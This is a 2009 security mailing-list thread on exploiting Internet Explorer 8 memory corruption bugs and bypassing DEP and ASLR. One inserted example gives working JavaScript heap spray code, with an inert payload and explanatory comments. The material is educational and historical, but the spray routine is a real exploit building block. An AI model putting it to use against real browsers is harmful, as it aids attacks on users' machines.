Re: [Full-disclosure] Exploiting memory corruption vulnerabilities on Internet Explorer 8
On Thu, Oct 1, 2009 at 6:44 PM, Freddie Vicious <fred.vici...@gmail.com> wrote:
> Yes, I am aware of the JVM and the Flash AVM heap spray techniques, no DEP/ASLR there... But as you said, so far there's no known catch-all technique against IE8. Along with other security features (http://blogs.msdn.com/architecture/archive/2009/08/13/internet-explorer-8-rated-tops-against-malware-and-phishing-attacks.aspx) this basically means that IE8 is the most secure web browser nowadays?

Depends. IMHO there is no "most secure browser", anyway (there is no "most secure software", ever). But there is a more secure environment in which the browser runs. There is some difference between running Firefox on Windows XP and running Firefox within a SELinux guest account under Fedora.

> On Thu, Oct 1, 2009 at 8:27 AM, Jared DeMott <jared.dem...@harris.com> wrote:
> > I'm not aware of any catch-all technique just for IE8, though there are a few common ones like return oriented programming. Application specific techniques are also common when third party extensions are involved.
> >
> > --
> > Jared D. DeMott
> > Principal Security Researcher
>
> --
> Best wishes,
> Freddie Vicious
> http://twitter.com/viciousf

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Exploiting memory corruption vulnerabilities on Internet Explorer 8
Yeah, that's pretty obvious that there's one way or another to bypass DEP and ASLR, but if you chose not to share it and don't have anything useful to say, it'll be better not to say anything.

On Thu, Oct 1, 2009 at 12:55 PM, Berend-Jan Wever <berendjanwe...@gmail.com> wrote:
> FYI: ASLR and DEP can be bypassed on x86, there's just nothing public at the moment.
>
> Cheers,
> SkyLined
>
> Berend-Jan Wever <berendjanwe...@gmail.com>
> http://skypher.com/SkyLined
>
> On Thu, Oct 1, 2009 at 6:44 PM, Freddie Vicious <fred.vici...@gmail.com> wrote:
> > Yes, I am aware of the JVM and the Flash AVM heap spray techniques, no DEP/ASLR there... But as you said, so far there's no known catch-all technique against IE8. Along with other security features (http://blogs.msdn.com/architecture/archive/2009/08/13/internet-explorer-8-rated-tops-against-malware-and-phishing-attacks.aspx) this basically means that IE8 is the most secure web browser nowadays?
> >
> > On Thu, Oct 1, 2009 at 8:27 AM, Jared DeMott <jared.dem...@harris.com> wrote:
> > > I'm not aware of any catch-all technique just for IE8, though there are a few common ones like return oriented programming. Application specific techniques are also common when third party extensions are involved.
> > >
> > > --
> > > Jared D. DeMott
> > > Principal Security Researcher
> >
> > --
> > Best wishes,
> > Freddie Vicious
> > http://twitter.com/viciousf

--
Best wishes,
Freddie Vicious
http://twitter.com/viciousf
Re: [Full-disclosure] Exploiting memory corruption vulnerabilities on Internet Explorer 8
Freddie Vicious wrote:
> Microsoft released Internet Explorer 8 on March 19, 2009, and up to now there's no reliable method to exploit memory corruption vulnerabilities on it? I mean, on IE6 and IE7 we had SkyLined's heap spray technique, first seen in the IFRAME overflow exploit [1], which has been used by almost every IE memory corruption exploit so far. Internet Explorer 8 was enhanced with DEP and ASLR protections, making heap spray useless. Then Mark Dowd and Alexander Sotirov published their great paper, Bypassing Browser Memory Protections [2], providing some excellent techniques, mainly the .NET binary technique, which bypasses DEP and ASLR and was used by Nils on the latest Pwn2Own to own Internet Explorer 8 RC (Release Candidate) [3] and was used to mass-exploit other vulnerabilities [4]. One day after Nils owned IE8 RC, Microsoft released Internet Explorer 8 RTM and blocked the option to load .NET DLLs from the Internet zone and the Restricted sites zone. Due to the fact that most IE exploitation doesn't occur in the Intranet/Trusted sites/Local machine zones, this makes the .NET DLL technique irrelevant most of the time. So my question is: is there no reliable method to exploit memory corruption vulnerabilities in Internet Explorer 8?

I'm not aware of any catch-all technique just for IE8, though there are a few common ones like return oriented programming. Application specific techniques are also common when third party extensions are involved.

> [1] http://milw0rm.com/exploits/612
> [2] http://taossa.com/archive/bh08sotirovdowd.pdf
> [3] http://dvlabs.tippingpoint.com/blog/2009/03/18/pwn2own-2009-day-1---safari-internet-explorer-and-firefox-taken-down-by-four-zero-day-exploits
> [4] http://milw0rm.com/exploits/8969
>
> --
> Best wishes,
> Freddie Vicious

--
Jared D. DeMott
Principal Security Researcher
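The heap spray the question above refers to, as an added example that is not code from this thread or from SkyLined's IFRAME exploit: it builds the NOP-sled-plus-payload blocks the way the IE6/IE7-era sprays did, but with an inert payload and tiny sizes so it can be inspected under Node rather than fired at a browser. The block size, the 0x20-byte per-block header allowance and the `%ucccc` stand-in payload are illustrative assumptions, not values taken from any real exploit.

```javascript
// Added example, not code from the thread: the mechanics of the IE6/IE7-era
// JavaScript heap spray, written to be inspected under Node. Block size, the
// per-block header allowance and the stand-in payload are assumptions.

// Stand-in for shellcode: int3 (0xCC) bytes as %u escapes. JS strings are
// UTF-16, so each %uXXXX escape is one code unit holding two bytes, stored
// low byte first on x86 (little endian).
const PAYLOAD_HEX = '%ucccc%ucccc';
const NOP_UNIT = '%u9090';   // two x86 NOP (0x90) bytes per code unit
const HEADER_BYTES = 0x20;   // assumed allocator/string overhead per block

// One spray block: a NOP sled followed by the payload, sized so that
// header + string data fills exactly blockBytes. Same-sized blocks tend to be
// placed back to back, so an address chosen inside the sprayed range lands at
// a predictable offset within some block, almost always in the sled.
function buildSprayBlock(payloadHex, blockBytes) {
  const payload = unescape(payloadHex);
  const sledUnits = (blockBytes - HEADER_BYTES) / 2 - payload.length;
  if (!Number.isInteger(sledUnits) || sledUnits < 0) {
    throw new RangeError('blockBytes too small or not even');
  }
  // Grow the sled by doubling so the build costs O(log n) concatenations.
  let sled = unescape(NOP_UNIT);
  while (sled.length < sledUnits) sled += sled;
  return sled.substring(0, sledUnits) + payload;
}

// Fill an array with copies of the block. In a browser this is the step that
// pushes the sled+payload pattern across hundreds of MB of heap; the classic
// spray used blocks of roughly 0x100000 bytes, a few hundred of them.
function spray(payloadHex, blockBytes, count) {
  const blocks = [];
  for (let i = 0; i < count; i++) {
    blocks.push(buildSprayBlock(payloadHex, blockBytes));
  }
  return blocks;
}

// What the CPU would fetch at a byte offset into a block's string data:
// 0x90 anywhere in the sled, the payload bytes at the tail.
function byteAt(block, offset) {
  const unit = block.charCodeAt(offset >> 1);
  return (offset & 1) ? (unit >> 8) & 0xff : unit & 0xff;
}

// Sanity check an exploit writer would run before using the spray: total
// size is right, every sled unit is 0x9090, and the payload sits at the end.
function verifyBlock(block, blockBytes, payloadHex) {
  const payload = unescape(payloadHex);
  if (block.length * 2 + HEADER_BYTES !== blockBytes) return false;
  if (!block.endsWith(payload)) return false;
  for (let i = 0; i < block.length - payload.length; i++) {
    if (block.charCodeAt(i) !== 0x9090) return false;
  }
  return true;
}

// Stand-alone run with tiny sizes, so this does not actually spray anything.
const demo = spray(PAYLOAD_HEX, 0x1000, 4);
console.log(demo.length, 'blocks of', demo[0].length * 2, 'bytes of string data, valid:',
  demo.every(b => verifyBlock(b, 0x1000, PAYLOAD_HEX)));
```

What the thread says about DEP follows directly from the layout: the sprayed bytes live in heap memory, which with DEP is mapped non-executable, so steering a corrupted pointer into the sled faults instead of sliding into the payload. Return oriented programming, which Jared names as the common alternative, executes code that is already mapped executable, so it is ASLR rather than DEP that has to be defeated there, which is why a module loaded at a predictable address (the .NET DLL trick in the referenced paper) mattered so much.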
Re: [Full-disclosure] Exploiting memory corruption vulnerabilities on Internet Explorer 8
Yes, I am aware of the JVM and the Flash AVM heap spray techniques, no DEP/ASLR there... But as you said, so far there's no known catch-all technique against IE8. Along with other security features (http://blogs.msdn.com/architecture/archive/2009/08/13/internet-explorer-8-rated-tops-against-malware-and-phishing-attacks.aspx) this basically means that IE8 is the most secure web browser nowadays?

On Thu, Oct 1, 2009 at 8:27 AM, Jared DeMott <jared.dem...@harris.com> wrote:
> I'm not aware of any catch-all technique just for IE8, though there are a few common ones like return oriented programming. Application specific techniques are also common when third party extensions are involved.
>
> --
> Jared D. DeMott
> Principal Security Researcher

--
Best wishes,
Freddie Vicious
http://twitter.com/viciousf
Re: [Full-disclosure] Exploiting memory corruption vulnerabilities on Internet Explorer 8
FYI: ASLR and DEP can be bypassed on x86, there's just nothing public at the moment.

Cheers,
SkyLined

Berend-Jan Wever <berendjanwe...@gmail.com>
http://skypher.com/SkyLined

On Thu, Oct 1, 2009 at 6:44 PM, Freddie Vicious <fred.vici...@gmail.com> wrote:
> Yes, I am aware of the JVM and the Flash AVM heap spray techniques, no DEP/ASLR there... But as you said, so far there's no known catch-all technique against IE8. Along with other security features (http://blogs.msdn.com/architecture/archive/2009/08/13/internet-explorer-8-rated-tops-against-malware-and-phishing-attacks.aspx) this basically means that IE8 is the most secure web browser nowadays?
>
> On Thu, Oct 1, 2009 at 8:27 AM, Jared DeMott <jared.dem...@harris.com> wrote:
> > I'm not aware of any catch-all technique just for IE8, though there are a few common ones like return oriented programming. Application specific techniques are also common when third party extensions are involved.
> >
> > --
> > Jared D. DeMott
> > Principal Security Researcher
>
> --
> Best wishes,
> Freddie Vicious
> http://twitter.com/viciousf
Re: [Full-disclosure] Exploiting memory corruption vulnerabilities on Internet Explorer 8
On Thu, 01 Oct 2009 21:55:37 +0200, Berend-Jan Wever said:
> FYI: ASLR and DEP can be bypassed on x86, there's just nothing public at the moment.

Is that "I believe it can, but there's no proof yet", or "based on non-public sources, I know for a fact it can"?
Re: [Full-disclosure] Exploiting memory corruption vulnerabilities on Internet Explorer 8
> Along with other security features (http://blogs.msdn.com/architecture/archive/2009/08/13/internet-explorer-8-rated-tops-against-malware-and-phishing-attacks.aspx) this basically means that IE8 is the most secure web browser nowadays?

If memory serves me right, it's been a while since we've witnessed successful, large-scale exploitation of memory corruption flaws in any browser, and it's probably not the most common exploitable security lapse these days. This is partly because many of the modern defenses - such as DEP/NX, ASLR, canaries, lower privileges / sandboxing - are becoming more prevalent across all browsers and operating systems; partly because browser vendors seem to be doing a lot of in-house fuzzing (for MSIE, Firefox, and Chrome, this is probably pretty evident); and last but not least, in part because of the changing landscape for security disclosure: researchers are heavily incentivized to sell vulnerabilities instead (keeping the public as such generally safe, but probably greatly increasing exposure windows for targeted attacks).

In the browser world, many other problems can have profound security consequences, however; browser chrome privilege escalations, zone fenceposts, even universal XSSes (made more serious by the fact that more and more of our sensitive data is handled by web applications), and other design errors that allow much simpler paths of privilege escalation (sometimes including system compromise) are taking center stage, particularly for malware distribution and other large-scale attacks. In this department, most vendors have several skeletons in the closet (Microsoft with content sniffing and zone model complexity, Firefox and some other browsers with privileged JavaScript used to implement extensions and UIs, etc).

Anyhow - in the end, I would be tempted to say that the differences between browsers are much less pronounced than the media feels compelled to say; but this new fierce competition between vendors is exceptional, highly notable, and very beneficial for the industry in the long run. For example, were it not for Firefox's claims of superior security and the ensuing market adoption, we would probably not see a sudden push for security features in MSIE8; and were it not for Microsoft's response, Mozilla folks would likely not feel compelled to keep up their in-house fuzzing efforts and security improvements in FF3 and 3.5. Then add Chrome to the mix, and it gets even more interesting...

/mz

PS. As for malware filtering - also, not a feature unique to any particular browser these days - I do not quite see the relevance to this discussion. Anti-malware checks improve the safety of casual browsing for the general public - and hence have a positive effect on the health of the Internet as a whole - but they do not render any particular browser less likely to have exploitable vulnerabilities.